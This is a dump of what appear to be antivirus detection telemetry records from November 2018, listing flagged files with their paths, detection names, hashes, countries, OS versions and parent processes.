  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\uinhflvas3w\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541021677.5bda1fed5af57', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\459265697.exe', parentsize=671232, timestamp='2018-11-01T01:09:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:12:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='\\\\?\\F:\\Autocad2008\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='ecbd09799db6eed90a04cc0b78fad74c450cc84b11a90cdb40fced5d281da8e3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-074717-8144ddb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-074440-5F869C43\\AVSCAN-20181102-074717-8144DDB4', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:50:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150259-aecd2bdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150259-AECD2BDD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093639-a4efe8d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093639-A4EFE8D0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:04:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emucsikf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\eMUcsIkf.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='servicio                                   .scr', filepath='E:\\Servicio                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='data-recovery_full1353.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\data-recovery_full1353.exe', filesize=19660000, name='W32/Sality.AT.#M1.#R1'), hash='d5f3fc3a019cbea78f1942edfca7086b60be637ba07e67e770af19977ead4e74', metadata=Row(cmdline='\\\\\\/onboot', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=3981368, timestamp='2018-11-01T14:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150819-ec1a1d70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150819-EC1A1D70', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:08:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eb8f40f6ae2bed7c96b26378e7eb0e1306b068b1b6e2ca2308c805920bb0bc81', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EB8F40F6AE2BED7C96B26378E7EB0E1306B068B1B6E2CA2308C805920BB0BC81', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='eb8f40f6ae2bed7c96b26378e7eb0e1306b068b1b6e2ca2308c805920bb0bc81', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:33:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104603-3cf518b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c797463e\\AVSCAN-20181101-104114-057E7BA2\\AVSCAN-20181101-104603-3CF518B2', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a6fb33563b388ee7f70756d2fcc1f94a52c2427f2d8bc8f63b6cdbeb9db48176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:46:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094705-1cfdfb62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094705-1CFDFB62', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newd162.tmp', filepath='\\\\?\\C:\\TMP\\NewD162.tmp', filesize=73744000, name='TR/Dropper.Gen.#M300.#R359'), hash='9054f39f7996268d48ac1bf8d439c0c78a834e463c922096a7e019d8be393949', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cccleaner.exe', filepath='\\\\?\\C:\\Program Files\\Siemens\\Automation\\SCADA-RT_V11\\WinCC\\bin\\CCCleaner.exe', filesize=136000, name='W32/Sality.AG.#M1.#R1'), hash='9fc034cc56460461b8033553d27f057ee8e80bb62a912d02ec5e86dbae25d940', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:05:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150503-c68679eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150503-C68679EB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sources.pif', filepath='F:\\sources\\sources.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201447-e9f56ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-201337-DF643630\\AVSCAN-20181101-201447-E9F56FF1', filesize=64000, name='VBA/Dldr.Agent.eozfz.#M1.#R1'), hash='8fb99a6889b86a9f75de34c20a8bde0eb6c9632475cfae64a436de7a5f37f5f0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:14:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:09:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243d7', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243d7', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:48:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150656-9a98ef4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150656-9A98EF4A', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131550-2c110ec4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131550-2C110EC4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4353862\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\crocclip-programas-gratis-net_2505564136.exe', parentsize=2515696, timestamp='2018-11-04T15:17:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4312752, timestamp='2018-11-04T00:33:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T15:16:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:53:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3933184, timestamp='2018-11-04T04:54:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zybkeh[1].jpg', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\S7Y9WTG7\\zybkeh[1].jpg', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:49:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:30:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msqry32.exe', filepath='C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSQRY32.EXE', filesize=732000, name='W32/Sality.#M1.#R1'), hash='7f52a8e010c576023e63a142ec0259e97e6ee0daa9cdf1e9af316496b8f63e7c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Avira\\SoftwareUpdater\\Avira.SoftwareUpdater.ServiceHost.exe', parentsize=102816, timestamp='2018-11-04T18:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4511385\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\minecraft-story-mode.exe', parentsize=2510000, timestamp='2018-11-04T20:33:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225314-ab393f1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-225314-AB393F1E', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:53:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='otc', filepath='root.pkg/Payload --> object --> ./Applications/Mac Tonic.app/Contents/PlugIns/OTC.plugin/Contents/MacOS/OTC', filesize=668000, name='OSX/GT32SupportGeeks.fbqvw.#M0.#R0'), hash='9345326fd7c62bdf38a322a697fc65b09d175b770c6a2466f4486341133f5a8e', metadata=Row(cmdline=None, country='FR', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:18:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T08:58:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_11_4_3.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Photoshop CS\\Help\\1_11_4_3.html', filesize=20000, name='JS/iFrame.EL.21.#M1.#R1'), hash='852aa72e0b94737b1b65e81893fbc8c819e1f99da4aa09058f3d9e5ea007f15c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:26:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='155955069.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\155955069.exe', filesize=384000, name='HEUR/AGEN.1005124.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline='\\\\\\/DB', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T15:59:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vstest.discoveryengine.exe', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.discoveryengine.exe', filesize=124000, name='W32/Neshta.A.#M1.#R1'), hash='1a7a3bd5a1330a3adff7c353834d82c998065f24d9684bdd2327dd1596e0ba47', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:7s2Ufj7IgU2HVgcw.1', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T11:25:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:35:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libcr64.dll', filepath='\\\\?\\C:\\Windows\\Temp\\ae7f8f31\\libcr64.dll', filesize=128000, name='TR/AD.CoinMiner.eukdq.#M1.#R1'), hash='726a9f478aaed66f0e4168594f2662198e8856e7e0f4e79085cff7c397dcc083', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:05:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182118-f83c4745', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_45312470\\AVSCAN-20181104-180213-22BA0E1F\\AVSCAN-20181104-182118-F83C4745', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:21:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085438-6f751425', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_07c97e1a\\AVSCAN-20181104-085419-6C968015\\AVSCAN-20181104-085438-6F751425', filesize=384000, name='TR/AD.Bladabindi.buhyf.#M1.#R1'), hash='7ce21869bd92bd470080368379e7feab16cdac0ab78ffee55db5b7b88e6fec45', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:54:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:03:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200630-148b95be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200630-148B95BE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:10:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='epsdnavisrv.exe', filepath='C:\\Program Files\\EPSON Software\\Download Navigator\\EPSDNAVISrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\36NIUATH\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220047-a430f48f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-220047-A430F48F', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:00:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182510.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp101\\A0182510.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:07Z'), dt=datetime.date(2018, 11, 4)),
